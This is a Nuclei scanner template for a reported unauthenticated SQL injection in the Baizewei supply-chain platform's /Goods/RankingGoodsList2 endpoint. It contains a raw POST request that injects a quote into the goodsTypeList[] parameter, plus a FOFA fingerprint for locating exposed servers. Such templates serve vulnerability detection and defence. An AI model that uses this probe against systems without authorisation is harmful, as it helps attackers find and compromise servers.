id: baizewei-rankinggoodslist2-sqli

info:
  name: 百择唯供应链存在RankingGoodsList2存在SQL注入漏洞
  author: qwtd
  severity: critical
  description: |
    百择唯供应链存在RankingGoodsList2 SQL注入漏洞，未经身份验证的攻击者通过漏洞，执行任意代码从而获取到服务器权限。
    注入参数 goodsTypeList%5B%5D
  reference:
    - https://wiki.wy876.cn/#/./%E7%99%BE%E6%8B%A9%E5%94%AF%E4%BE%9B%E5%BA%94%E9%93%BE/%E7%99%BE%E6%8B%A9%E5%94%AF%E4%BE%9B%E5%BA%94%E9%93%BE%E5%AD%98%E5%9C%A8RankingGoodsList2%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
  metadata:
    fofa: body="/Content/Css/_SiteCss/"
    verified: true
  tags: 百择唯供应链

http:
  - raw:
      - |
        POST /Goods/RankingGoodsList2 HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 99
        Accept: */*
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Connection: keep-alive

        goodsTypeList%5B%5D=090501'&goodsSortType=Recommend&ColumnName=%E5%90%8C%E7%B1%BB%E6%8E%A8%E8%8D%90
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"Status":0'
          - '"IsSucceed":false'
        condition: and
      - type: status
        status:
          - 500